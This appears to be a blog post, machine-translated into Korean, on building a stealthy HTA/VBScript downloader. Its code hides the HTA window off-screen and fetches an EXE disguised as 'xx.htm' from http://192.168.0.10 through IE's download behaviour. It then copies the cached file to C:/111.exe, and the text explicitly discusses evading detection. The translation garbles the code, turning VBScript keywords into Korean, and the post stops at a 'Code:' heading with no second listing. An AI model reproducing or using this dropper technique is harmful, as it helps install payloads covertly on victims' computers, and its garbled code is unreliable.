1.이 블로그에서 비교적 새로운 VBS 다운로더 두 명에 대해 먼저 이야기합시다. 하나는 cdo.message 구성 요소를 사용하고 다른 하나는 Microsoft.xmldom을 사용하여 만들어집니다. http://www.jb51.net/article/15506.htm을 참조하십시오. 이 두 다운로더 중 하나는 사용하기가 번거 롭고 EXE를 미리 변환해야합니다. 둘째, cscript.exe는 사용 중에 네트워크에 액세스 할 수 있으며, 이는 너무 숨겨지지 않습니다. 두 번째는 일부 기계에는이 두 구성 요소가없고 adodb.stream을 사용한다는 것입니다.
2. Lake2 http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx의 다운로더에 대해 이야기 해 봅시다. 이 다운로더는 꽤 좋지만 문제가 있습니다. 하나는 360과 같은 다른 브라우저가 설치되면 IE 창이 열리고 레지스트리에서 읽은 IE 캐시 위치가 정확하지 않을 수 있다는 것입니다.
3. 그러면 이러한 결함을 어떻게 업데이트합니까? 여전히 방법이 있습니다. 우리는 HTA를 사용 하여이 글을 쓰는데, 이는 비교적 드 rare니다. HH.exe는 일반적으로 네트워크에 액세스 할 때 릴리스됩니다. 이 다운로더를 작성하여 몇 가지 어려움을 해결해야합니다.
(1). Make hta invisible------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(2). Make hta receive command line parameters-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(3). Do not call all components mentioned in the first and second items above-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(4) Temporary location of .ie cache ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(5) We do not call any component------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4. 코드 (HTA에서 매개 변수를 직접 쓰기)
코드는 다음과 같습니다.
<스크립트 언어 = vbs>
Window.moveto 4000,4000
window.resizeto 0,0 'HTA를 보이지 않게 만듭니다
set objshell = createobject ( "wscript.shell") 'hta는 wscript.shell을 직접 호출 할 수 있지만 wscript.createobject ( "wscript.shell")를 호출 할 수는 없습니다.
downpath = objshell.expandenvironmentstrings ( "%userprofile%") & "/로컬 설정" '환경 변수에 따라 다운로드 경로 가져 오기
XML = document.createElement ( "XML") 'XML 요소를 생성하는 기본 동작 IE
xml.addbehavior ( "#default#download")
xml.async = 0
xml.load ( "http://192.168.0.10/xx.htm") 'Exe의 이름을 공간으로 변경하십시오. FTP 소프트웨어로 업로드하면 작동하지 않을 수 있습니다. 그냥 착용하는 것이 좋습니다.
showallfile (downpath)
Sub ShowAllFile (Path) '여행 및 검색, Lake2의 코드를 직접 사용하십시오.
findfilename = "xx [1] .htm" '이것은 또한 변경해야 할 것입니다. 위가 xx.htm이면 여기 xx [1] .htm이 있습니다
set fso = createobject ( "scripting.filesystemobject")
f = fso.getfolder (경로) 설정
fc = f.subfolders를 설정하십시오
FC의 각 F1에 대해
fso.fileExists (path & "/"& f1.name & "/"& findfilename)
fso.copyfile path & "/"& f1.name & "/"& findfilename, "c : /111.exe" 'C : /111.exe로 저장되며 필요에 따라 변경할 수 있습니다.
'document.write "[+] 성공 다운로드!"
끝 If
showallfile 경로 & "/"& f1.name
다음
FSO = 아무것도 설정하지 않습니다
종료 서브
Window.close
</스크립트>
사용법은 다음과 같습니다. xx.exe처럼 exe를 공간에 넣은 다음이 HTA를 두 번 클릭하십시오.
5. 다른 코드 (패스 명령 줄 매개 변수)
나는 개인적으로 네 번째 부분의 코드가 더 좋다고 생각합니다. 수정하고 사용하십시오. 명령 줄 매개 변수가 호출되면 HTA 창이 여전히 나타나고 다운로드 후에 만 닫히는 것을 발견하므로별로 좋지 않습니다. 암호: